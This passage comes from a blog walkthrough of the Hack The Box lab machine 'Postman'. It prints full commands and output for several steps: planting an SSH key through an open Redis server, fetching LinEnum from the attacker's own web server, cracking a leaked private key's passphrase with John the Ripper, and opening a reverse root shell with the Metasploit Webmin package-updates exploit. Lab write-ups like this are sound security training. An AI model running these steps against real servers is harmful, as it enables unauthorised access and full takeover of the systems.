</span></pre></table></code></div></div><p>We then have to prepare the public key to be sent to the <code class="language-plaintext highlighter-rouge">redis</code> server.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre><td class="rouge-code"><pre><span class="nv">$ </span><span class="o">(</span><span class="nb">echo</span> <span class="nt">-e</span> <span class="s2">"</span><span class="se">\n\n</span><span class="s2">"</span><span class="p">;</span> <span class="nb">cat</span> ~/.ssh/id_rsa.pub<span class="p">;</span> <span class="nb">echo</span> <span class="nt">-e</span> <span class="s2">"</span><span class="se">\n\n</span><span class="s2">"</span><span class="o">)</span> <span class="o">&gt;</span> foo.txt
</pre></table></code></div></div><p>Using <code class="language-plaintext highlighter-rouge">redis-cli</code>, we connect to the <code class="language-plaintext highlighter-rouge">redis</code> server and print the current working directory as well as the location of where the database will be saved to.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
</pre><td class="rouge-code"><pre>redis-cli <span class="nt">-h</span> postman.htb
postman.htb:6379&gt; config get <span class="nb">dir
</span>1<span class="o">)</span> <span class="s2">"dir"</span>
2<span class="o">)</span> <span class="s2">"/var/lib/redis/.ssh"</span>
postman.htb:6379&gt; config get dbfilename
1<span class="o">)</span> <span class="s2">"dbfilename"</span>
2<span class="o">)</span> <span class="s2">"authorized_keys"</span>
</pre></table></code></div></div><p>Alright, we are in the correct directory already and the the database will be written to <code class="language-plaintext highlighter-rouge">authorized_keys</code> when we save. Next we need to clear the database, write our key into it and then save it.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
</pre><td class="rouge-code"><pre><span class="nv">$ </span>redis-cli <span class="nt">-h</span> postman.htb flushall
OK
<span class="nv">$ </span><span class="nb">cat </span>foo.txt | redis-cli <span class="nt">-h</span> postman.htb <span class="nt">-x</span> <span class="nb">set </span>crackit
OK
<span class="nv">$ </span>redis-cli <span class="nt">-h</span> postman.htb save
OK
</pre></table></code></div></div><p>Now if try to <code class="language-plaintext highlighter-rouge">ssh</code> as the <code class="language-plaintext highlighter-rouge">redis</code> user using the <code class="language-plaintext highlighter-rouge">ssh</code> key we made,</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre>ssh <span class="nt">-i</span> ~/.ssh/id_rsa redis@postman.htb
Welcome to Ubuntu 18.04.3 LTS <span class="o">(</span>GNU/Linux 4.15.0-58-generic x86_64<span class="o">)</span>

 <span class="k">*</span> Documentation:  https://help.ubuntu.com
 <span class="k">*</span> Management:     https://landscape.canonical.com
 <span class="k">*</span> Support:        https://ubuntu.com/advantage


 <span class="k">*</span> Canonical Livepatch is available <span class="k">for </span>installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Tue Dec 31 09:16:39 2019 from 10.10.XX.XX
redis@Postman:~<span class="err">$</span>
</pre></table></code></div></div><p>Success! Too bad <code class="language-plaintext highlighter-rouge">redis</code> wasn’t the user that has the flag :P If we list <code class="language-plaintext highlighter-rouge">/home</code>, we see another user called <code class="language-plaintext highlighter-rouge">Matt</code>.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre>redis@Postman:~<span class="nv">$ </span><span class="nb">ls</span> /home
Matt
</pre></table></code></div></div><p>Lets see if running <a href="https://github.com/rebootuser/LinEnum">‘LinEnum’</a> will give us any insights on how to get access to <code class="language-plaintext highlighter-rouge">Matt</code>. I will be starting a web server on my machine using the builtin <code class="language-plaintext highlighter-rouge">SimpleHTTPServer</code> module in <code class="language-plaintext highlighter-rouge">python</code> and use <code class="language-plaintext highlighter-rouge">wget</code> to retrieve it.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
</pre><td class="rouge-code"><pre><span class="nv">$ </span><span class="nb">mkdir </span>httpserver
<span class="nv">$ </span><span class="nb">cd </span>httpserver
<span class="nv">$ </span><span class="nb">cp</span> ~/LinEnum.sh <span class="nb">.</span>
<span class="nv">$ </span>python <span class="nt">-m</span> SimpleHTTPServer 80
Serving HTTP on 0.0.0.0 port 80 ...
</pre></table></code></div></div><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
</pre><td class="rouge-code"><pre>redis@Postman:~<span class="nv">$ </span>wget http://10.10.XX.XX/LinEnum.sh
<span class="nt">--2019-12-31</span> 10:18:04--  http://10.10.XX.XX/LinEnum.sh
Connecting to 10.10.XX.XX:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46476 <span class="o">(</span>45K<span class="o">)</span> <span class="o">[</span>text/x-sh]
Saving to: ‘LinEnum.sh’

LinEnum.sh                   100%[<span class="o">=============================================&gt;]</span>  45.39K  59.1KB/s    <span class="k">in </span>0.8s    

2019-12-31 10:18:05 <span class="o">(</span>59.1 KB/s<span class="o">)</span> - ‘LinEnum.sh’ saved <span class="o">[</span>46476/46476]

</pre></table></code></div></div><p>Running <code class="language-plaintext highlighter-rouge">LinEnum.sh</code> shows that there is a <code class="language-plaintext highlighter-rouge">ssh</code> private key backup in <code class="language-plaintext highlighter-rouge">/opt</code> named <code class="language-plaintext highlighter-rouge">id_rsa.bak</code> owned by user <code class="language-plaintext highlighter-rouge">Matt</code>. Interesting…</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
</pre><td class="rouge-code"><pre>redis@Postman:~<span class="nv">$ </span>./LinEnum.sh
...
<span class="o">[</span>-] Location and Permissions <span class="o">(</span><span class="k">if </span>accessible<span class="o">)</span> of .bak file<span class="o">(</span>s<span class="o">)</span>:
<span class="nt">-rwxr-xr-x</span> 1 Matt Matt 1743 Aug 26 00:11 /opt/id_rsa.bak
<span class="nt">-rw-------</span> 1 root root 695 Aug 25 21:24 /var/backups/group.bak
<span class="nt">-rw-------</span> 1 root shadow 577 Aug 25 21:24 /var/backups/gshadow.bak
<span class="nt">-rw-------</span> 1 root shadow 935 Aug 26 03:50 /var/backups/shadow.bak
<span class="nt">-rw-------</span> 1 root root 1382 Aug 25 23:48 /var/backups/passwd.bak
...

redis@Postman:~<span class="nv">$ </span><span class="nb">cat</span> /opt/id_rsa.bak
redis@Postman:~<span class="nv">$ </span><span class="nb">cat</span> /opt/id_rsa.bak
<span class="nt">-----BEGIN</span> RSA PRIVATE KEY-----
Proc-Type: 4,ENCRYPTED
DEK-Info: DES-EDE3-CBC,73E9CEFBCCF5287C

JehA51I17rsCOOVqyWx+C8363IOBYXQ11Ddw/pr3L2A2NDtB7tvsXNyqKDghfQnX
cwGJJUD9kKJniJkJzrvF1WepvMNkj9ZItXQzYN8wbjlrku1bJq5xnJX9EUb5I7k2
7GsTwsMvKzXkkfEZQaXK/T50s3I4Cdcfbr1dXIyabXLLpZOiZEKvr4+KySjp4ou6
cdnCWhzkA/TwJpXG1WeOmMvtCZW1HCButYsNP6BDf78bQGmmlirqRmXfLB92JhT9
1u8JzHCJ1zZMG5vaUtvon0qgPx7xeIUO6LAFTozrN9MGWEqBEJ5zMVrrt3TGVkcv
EyvlWwks7R/gjxHyUwT+a5LCGGSjVD85LxYutgWxOUKbtWGBbU8yi7YsXlKCwwHP
UH7OfQz03VWy+K0aa8Qs+Eyw6X3wbWnue03ng/sLJnJ729zb3kuym8r+hU+9v6VY
Sj+QnjVTYjDfnT22jJBUHTV2yrKeAz6CXdFT+xIhxEAiv0m1ZkkyQkWpUiCzyuYK
t+MStwWtSt0VJ4U1Na2G3xGPjmrkmjwXvudKC0YN/OBoPPOTaBVD9i6fsoZ6pwnS
5Mi8BzrBhdO0wHaDcTYPc3B00CwqAV5MXmkAk2zKL0W2tdVYksKwxKCwGmWlpdke
P2JGlp9LWEerMfolbjTSOU5mDePfMQ3fwCO6MPBiqzrrFcPNJr7/McQECb5sf+O6
jKE3Jfn0UVE2QVdVK3oEL6DyaBf/W2d/3T7q10Ud7K+4Kd36gxMBf33Ea6+qx3Ge
SbJIhksw5TKhd505AiUH2Tn89qNGecVJEbjKeJ/vFZC5YIsQ+9sl89TmJHL74Y3i
l3YXDEsQjhZHxX5X/RU02D+AF07p3BSRjhD30cjj0uuWkKowpoo0Y0eblgmd7o2X
0VIWrskPK4I7IH5gbkrxVGb/9g/W2ua1C3Nncv3MNcf0nlI117BS/QwNtuTozG8p
S9k3li+rYr6f3ma/ULsUnKiZls8SpU+RsaosLGKZ6p2oIe8oRSmlOCsY0ICq7eRR
hkuzUuH9z/mBo2tQWh8qvToCSEjg8yNO9z8+LdoN1wQWMPaVwRBjIyxCPHFTJ3u+
Zxy0tIPwjCZvxUfYn/K4FVHavvA+b9lopnUCEAERpwIv8+tYofwGVpLVC0DrN58V
XTfB2X9sL1oB3hO4mJF0Z3yJ2KZEdYwHGuqNTFagN0gBcyNI2wsxZNzIK26vPrOD
b6Bc9UdiWCZqMKUx4aMTLhG5ROjgQGytWf/q7MGrO3cF25k1PEWNyZMqY4WYsZXi
WhQFHkFOINwVEOtHakZ/ToYaUQNtRT6pZyHgvjT0mTo0t3jUERsppj1pwbggCGmh
KTkmhK+MTaoy89Cg0Xw2J18Dm0o78p6UNrkSue1CsWjEfEIF3NAMEU2o+Ngq92Hm
npAFRetvwQ7xukk0rbb6mvF8gSqLQg7WpbZFytgS05TpPZPM0h8tRE8YRdJheWrQ
VcNyZH8OHYqES4g2UF62KpttqSwLiiF4utHq+/h5CQwsF+JRg88bnxh2z2BD6i5W
X+hK5HPpp6QnjZ8A5ERuUEGaZBEUvGJtPGHjZyLpkytMhTjaOrRNYw<span class="o">==</span>
<span class="nt">-----END</span> RSA PRIVATE KEY-----
</pre></table></code></div></div><p>With this private <code class="language-plaintext highlighter-rouge">ssh</code> key, we could try to <code class="language-plaintext highlighter-rouge">ssh</code> as <code class="language-plaintext highlighter-rouge">Matt</code>.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
</pre><td class="rouge-code"><pre><span class="nv">$ </span>ssh <span class="nt">-i</span> id_rsa.bak Matt@postman.htb
Enter passphrase <span class="k">for </span>key <span class="s1">'id_rsa.bak'</span>:
</pre></table></code></div></div><p>Seems like we need a passphrase. Lets see if we can crack it with <code class="language-plaintext highlighter-rouge">john</code>.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
</pre><td class="rouge-code"><pre><span class="nv">$ </span>python ssh2john.py id_rsa.bak <span class="o">&gt;</span> matt.hash
<span class="nv">$ </span>john <span class="nt">--wordlist</span><span class="o">=</span>/usr/share/wordlists/rockyou.txt matt.hash
Using default input encoding: UTF-8
Loaded 1 password <span class="nb">hash</span> <span class="o">(</span>SSH <span class="o">[</span>RSA/DSA/EC/OPENSSH <span class="o">(</span>SSH private keys<span class="o">)</span> 32/64]<span class="o">)</span>
Cost 1 <span class="o">(</span>KDF/cipher <span class="o">[</span><span class="nv">0</span><span class="o">=</span>MD5/AES <span class="nv">1</span><span class="o">=</span>MD5/3DES <span class="nv">2</span><span class="o">=</span>Bcrypt/AES]<span class="o">)</span> is 1 <span class="k">for </span>all loaded hashes
Cost 2 <span class="o">(</span>iteration count<span class="o">)</span> is 2 <span class="k">for </span>all loaded hashes
Will run 4 OpenMP threads
Note: This format may emit <span class="nb">false </span>positives, so it will keep trying even after
finding a possible candidate.
Press <span class="s1">'q'</span> or Ctrl-C to abort, almost any other key <span class="k">for </span>status
computer2008     <span class="o">(</span>matt<span class="o">)</span>
Warning: Only 2 candidates left, minimum 8 needed <span class="k">for </span>performance.
1g 0:00:00:04 DONE <span class="o">(</span>2019-12-31 05:57<span class="o">)</span> 0.2083g/s 2987Kp/s 2987Kc/s 2987KC/sa6_123..<span class="k">*</span>7¡Vamos!
Session completed

</pre></table></code></div></div><p>With the passphrase, lets try to <code class="language-plaintext highlighter-rouge">ssh</code> as <code class="language-plaintext highlighter-rouge">Matt</code> again.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre><span class="nv">$ </span>ssh <span class="nt">-i</span> id_rsa.bak Matt@postman.htb
Enter passphrase <span class="k">for </span>key <span class="s1">'id_rsa.bak'</span>: 
Connection closed by 10.10.10.160 port 22
</pre></table></code></div></div><p>What is going on? We are immediately getting disconnected. After some trials, I kind of gave up and decided to move on to the next service at port <code class="language-plaintext highlighter-rouge">10000</code>.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/postman3.png" alt="" /></p><p>Hmm lets shift to <code class="language-plaintext highlighter-rouge">HTTPS</code>. We are immediately greeted with a login page.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/postman4.png" alt="" /></p><p>Lets try to login using <code class="language-plaintext highlighter-rouge">Matt:computer2008</code> as our credentials.</p><p><img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" data-src="/assets/images/postman5.png" alt="" /></p><p>Ooo it seems like a dashboard that monitors the <code class="language-plaintext highlighter-rouge">Webmin</code> service. After looking around, there doesn’t seem to be any place where we attack from. Lets see if we can find any exploits using <code class="language-plaintext highlighter-rouge">searchsploit</code>.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
</pre><td class="rouge-code"><pre><span class="nv">$ </span>searchsploit webmin
<span class="nt">--------------------------------------------------------------------------</span> <span class="nt">----------------------------------------</span>
 Exploit Title                                                            |  Path
                                                                          | <span class="o">(</span>/usr/share/exploitdb/<span class="o">)</span>
<span class="nt">--------------------------------------------------------------------------</span> <span class="nt">----------------------------------------</span>
...
Webmin 1.910 - <span class="s1">'Package Updates'</span> Remote Command Execution <span class="o">(</span>Metasploit<span class="o">)</span>    | exploits/linux/remote/46984.rb
...
<span class="nt">--------------------------------------------------------------------------</span> <span class="nt">----------------------------------------</span>
Shellcodes: No Result
</pre></table></code></div></div><h1 id="exploitation">Exploitation</h1><p>Hmm from the <code class="language-plaintext highlighter-rouge">nmap</code> results and the dashboard, we can tell that the version of <code class="language-plaintext highlighter-rouge">Webmin</code> is <code class="language-plaintext highlighter-rouge">1.910</code>, hence we will use the exploit whose target version is nearest to it.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
</pre><td class="rouge-code"><pre><span class="nv">$ </span>msfconsole
msf5 <span class="o">&gt;</span> use exploit/linux/http/webmin_packageup_rce
msf5 exploit<span class="o">(</span>linux/http/webmin_packageup_rce<span class="o">)</span> <span class="o">&gt;</span> <span class="nb">set </span>LHOST 10.10.XX.XX
LHOST <span class="o">=&gt;</span> 10.10.XX.XX
msf5 exploit<span class="o">(</span>linux/http/webmin_packageup_rce<span class="o">)</span> <span class="o">&gt;</span> <span class="nb">set </span>RHOSTS postman.htb
RHOSTS <span class="o">=&gt;</span> postman.htb
msf5 exploit<span class="o">(</span>linux/http/webmin_packageup_rce<span class="o">)</span> <span class="o">&gt;</span> <span class="nb">set </span>USERNAME Matt
USERNAME <span class="o">=&gt;</span> Matt
msf5 exploit<span class="o">(</span>linux/http/webmin_packageup_rce<span class="o">)</span> <span class="o">&gt;</span> <span class="nb">set </span>PASSWORD computer2008
PASSWORD <span class="o">=&gt;</span> computer2008
msf5 exploit<span class="o">(</span>linux/http/webmin_packageup_rce<span class="o">)</span> <span class="o">&gt;</span> run

<span class="k">*</span><span class="o">]</span> Started reverse TCP handler on 10.10.XX.XX:1337 
<span class="o">[</span>+] Session cookie: 169f13b0b46f82aeea5f5ea57524526f
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Attempting to execute the payload...
<span class="o">[</span><span class="k">*</span><span class="o">]</span> Command shell session 2 opened <span class="o">(</span>10.10.XX.XX:4444 -&gt; 10.10.10.160:55156<span class="o">)</span> at 2019-12-31 07:50:17 <span class="nt">-0500</span>


</pre></table></code></div></div><p>There’s no prompt but lets try to upgrade to a <code class="language-plaintext highlighter-rouge">tty</code> shell.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>python <span class="nt">-c</span> <span class="s1">'import pty; pty.spawn("/bin/bash")'</span>
root@Postman:/usr/share/webmin/package-updates/# <span class="nb">id
id
</span><span class="nv">uid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span> <span class="nb">groups</span><span class="o">=</span>0<span class="o">(</span>root<span class="o">)</span>
</pre></table></code></div></div><p>Oh damn! We are already root! Getting both the user and root flags should be no problem now.</p><h1 id="usertxt1">user.txt(1)</h1><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>root@Postman:/usr/share/webmin/package-updates/# <span class="nb">cat</span> /home/Matt/user.txt
<span class="nb">cat</span> /home/Matt/user.txt
517aXXXXXXXXXXXXXXXXXXXXXXXXXXXX
</pre></table></code></div></div><h1 id="roottxt">root.txt</h1><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre><td class="rouge-code"><pre>root@Postman:/usr/share/webmin/package-updates/# <span class="nb">cat</span> /root/root.txt
<span class="nb">cat</span> /root/root.txt
a257XXXXXXXXXXXXXXXXXXXXXXXXXXXX
</pre></table></code></div></div><h1 id="usertxt2">user.txt(2)</h1><p>Turns out <code class="language-plaintext highlighter-rouge">ssh</code>ing as the user isn’t the only way to remotely access it. Running <code class="language-plaintext highlighter-rouge">su</code> allowed us login at <code class="language-plaintext highlighter-rouge">Matt</code>.</p><div class="language-bash highlighter-rouge"><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
4
</pre><td class="rouge-code"><pre>redis@Postman:~<span class="nv">$ </span>su Matt
Password: 
Matt@Postman:/var/lib/redis<span class="nv">$ </span><span class="nb">cat</span> ~/user.txt
517aXXXXXXXXXXXXXXXXXXXXXXXXXXXX
</pre></table></code></div></div><h3 id="rooted--thank-you-for-reading-and-look-forward-for-more-writeups-and-articles-">Rooted ! Thank you for reading and look forward for more writeups and articles !</h3></div><div class="post-tail-wrapper text-muted"><div class="post-meta mb-3"> <i class="far fa-folder-open fa-fw mr-1"></i> <a href='/categories/hackthebox/'>hackthebox</a></div><div class="post-tags"> <i class="fa fa-tags fa-fw mr-1"></i> <a href="/tags/redis/" class="post-tag no-text-decoration" >redis</a> <a href="/tags/ssh/" class="post-tag no-text-decoration" >ssh</a> <a href="/tags/webmin/" class="post-tag no-text-decoration" >webmin</a> <a href="/tags/linux/" class="post-tag no-text-decoration" >linux</a></div><div class="post-tail-bottom d-flex justify-content-between align-items-center mt-3 pt-5 pb-2"><div class="license-wrapper"> This post is licensed under <a href="https://creativecommons.org/licenses/by/4.0/">CC BY 4.0</a> by the author.</div><div class="share-wrapper"> <span class="share-label text-muted mr-1">Share</span> <span class="share-icons"> <a href="https://twitter.com/intent/tweet?text=Hack The Box - Postman - rizemon's blog&url=https://rizemon.github.io/posts/postman-htb/" data-toggle="tooltip" data-placement="top" title="Twitter" target="_blank" rel="noopener" aria-label="Twitter"> <i class="fa-fw fab fa-twitter"></i> </a> <a href="https://www.facebook.com/sharer/sharer.php?title=Hack The Box - Postman - rizemon's blog&u=https://rizemon.github.io/posts/postman-htb/" data-toggle="tooltip" data-placement="top" title="Facebook" target="_blank" rel="noopener" aria-label="Facebook"> <i class="fa-fw fab fa-facebook-square"></i> </a> <a href="https://telegram.me/share?text=Hack The Box - Postman - rizemon's blog&url=https://rizemon.github.io/posts/postman-htb/" data-toggle="tooltip" data-placement="top" title="Telegram" target="_blank" rel="noopener" aria-label="Telegram"> <i class="fa-fw fab fa-telegram"></i> </a> <i class="fa-fw fas fa-link small" onclick="copyLink()" data-toggle="tooltip" data-placement="top" title="Copy link"></i> </span></div></div></div></div></div><div id="panel-wrapper" class="col-xl-3 pl-2 text-muted topbar-down"><div class="access"><div id="access-lastmod" class="post"> <span>Recent Update</span><ul class="post-content pl-0 pb-1 ml-1 mt-2"><li><a href="/posts/htbcybersanta-ctf/">HackTheBox CTF - Cyber Santa</a><li><a href="/posts/ticket1part2-thm/">TryHackMe - Pre Security Learning Path (Part 2) [PARTICIPATE IN THE GIVEAWAY!]</a><li><a href="/posts/oscp-reflection/">Post-OSCP Writeup</a><li><a href="/posts/granny-htb/">Hack The Box - Granny (Without Metasploit)</a><li><a href="/posts/cronos-htb/">Hack The Box - Cronos (Without Metasploit)</a></ul></div><div id="access-tags"> <span>Trending Tags</span><div class="d-flex flex-wrap mt-3 mb-1 mr-3"> <a class="post-tag" href="/tags/linux/">linux</a> <a class="post-tag" href="/tags/windows/">windows</a> <a class="post-tag" href="/tags/php/">php</a> <a class="post-tag" href="/tags/ssh/">ssh</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/lfi/">lfi</a> <a class="post-tag" href="/tags/juicypotato/">juicypotato</a> <a class="post-tag" href="/tags/rsa/">rsa</a> <a class="post-tag" href="/tags/smb/">smb</a> <a class="post-tag" href="/tags/sudo/">sudo</a></div></div></div><div id="toc-wrapper" class="pl-0 pr-4 mb-5"> <span class="pl-3 pt-2 mb-2">Contents</span><nav id="toc" data-toggle="toc"></nav></div></div></div><div class="row"><div class="col-12 col-lg-11 col-xl-8"><div id="post-extend-wrapper" class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-md-4 pr-md-4"><div id="related-posts" class="mt-5 mb-2 mb-sm-4"><h3 class="pt-2 mt-1 mb-4 ml-1" data-toc-skip>Further Reading</h3><div class="card-deck mb-4"><div class="card"> <a href="/posts/traverxec-htb/"><div class="card-body"> <span class="timeago small" > Apr 12, 2020 <i class="unloaded">2020-04-12T02:48:00+08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack The Box - Traverxec</h3><div class="text-muted small"><p> This box was the last Easy box of the year 2019 and it has made me realise that I really have went a long way since the start of my journey in HackTheBox. Configuration The operating systems th...</p></div></div></a></div><div class="card"> <a href="/posts/writeup-htb/"><div class="card-body"> <span class="timeago small" > Oct 13, 2019 <i class="unloaded">2019-10-13T15:35:00+08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack The Box - Writeup</h3><div class="text-muted small"><p> Configuration The operating system that I will be using to tackle this machine is a Kali Linux VM. Always remember to map a domain name to the machine’s IP address to ease your rooting ! $ ech...</p></div></div></a></div><div class="card"> <a href="/posts/haystack-htb/"><div class="card-body"> <span class="timeago small" > Nov 3, 2019 <i class="unloaded">2019-11-03T18:38:00+08:00</i> </span><h3 class="pt-0 mt-1 mb-3" data-toc-skip>Hack The Box - Haystack</h3><div class="text-muted small"><p> I really felt that this machine resonated with me because of the Elastic Stack components running on it and I happened to be learning about them at that point of time XD Configuration The opera...</p></div></div></a></div></div></div><div class="post-navigation d-flex justify-content-between"> <a href="/posts/json-htb/" class="btn btn-outline-primary"><p>Hack The Box - Json</p></a> <a href="/posts/forest-htb/" class="btn btn-outline-primary"><p>Hack The Box - Forest</p></a></div></div></div></div><script type="text/javascript" src="https://cdn.jsdelivr.net/npm/lozad/dist/lozad.min.js"></script> <script type="text/javascript"> const imgs = document.querySelectorAll('#post-wrapper img'); const observer = lozad(imgs); observer.observe(); </script><footer class="d-flex w-100 justify-content-center"><div class="d-flex justify-content-between align-items-center"><div class="footer-left"><p class="mb-0"> © 2022 <a href="https://twitter.com/rizemon">rizemon</a>. <span data-toggle="tooltip" data-placement="top" title="Except where otherwise noted, the blog posts on this site are licensed under the Creative Commons Attribution 4.0 International (CC BY 4.0) License by the author.">Some rights reserved.</span></p></div><div class="footer-right"><p class="mb-0"> Powered by <a href="https://jekyllrb.com" target="_blank" rel="noopener">Jekyll</a> with <a href="https://github.com/cotes2020/jekyll-theme-chirpy/" target="_blank" rel="noopener">Chirpy</a> theme.</p></div></div></footer></div><div id="search-result-wrapper" class="d-flex justify-content-center unloaded"><div class="col-12 col-xl-11 post-content"><div id="search-hints"><h4 class="text-muted mb-4">Trending Tags</h4><a class="post-tag" href="/tags/linux/">linux</a> <a class="post-tag" href="/tags/windows/">windows</a> <a class="post-tag" href="/tags/php/">php</a> <a class="post-tag" href="/tags/ssh/">ssh</a> <a class="post-tag" href="/tags/sqli/">sqli</a> <a class="post-tag" href="/tags/lfi/">lfi</a> <a class="post-tag" href="/tags/juicypotato/">juicypotato</a> <a class="post-tag" href="/tags/rsa/">rsa</a> <a class="post-tag" href="/tags/smb/">smb</a> <a class="post-tag" href="/tags/sudo/">sudo</a></div><div id="search-results" class="d-flex flex-wrap justify-content-center text-muted mt-3"></div></div></div></div><div id="mask"></div><a id="back-to-top" href="#" aria-label="back-to-top" class="btn btn-lg btn-box-shadow" role="button"> <i class="fas fa-angle-up"></i> </a> <script src="https://cdn.jsdelivr.net/npm/simple-jekyll-search@1.7.3/dest/simple-jekyll-search.min.js"></script> <script> SimpleJekyllSearch({ searchInput: document.getElementById('search-input'), resultsContainer: document.getElementById('search-results'), json: '/assets/js/data/search.json', searchResultTemplate: '<div class="pl-1 pr-1 pl-sm-2 pr-sm-2 pl-lg-4 pr-lg-4 pl-xl-0 pr-xl-0"> <a href="https://rizemon.github.io{url}">{title}</a><div class="post-meta d-flex flex-column flex-sm-row text-muted mt-1 mb-1"><div class="mr-sm-4"><i class="far fa-folder fa-fw"></i>{categories}</div><div><i class="fa fa-tag fa-fw"></i>{tags}</div></div><p>{snippet}</p></div>', noResultsText: '<p class="mt-5">Oops! No result founds.</p>' }); </script>
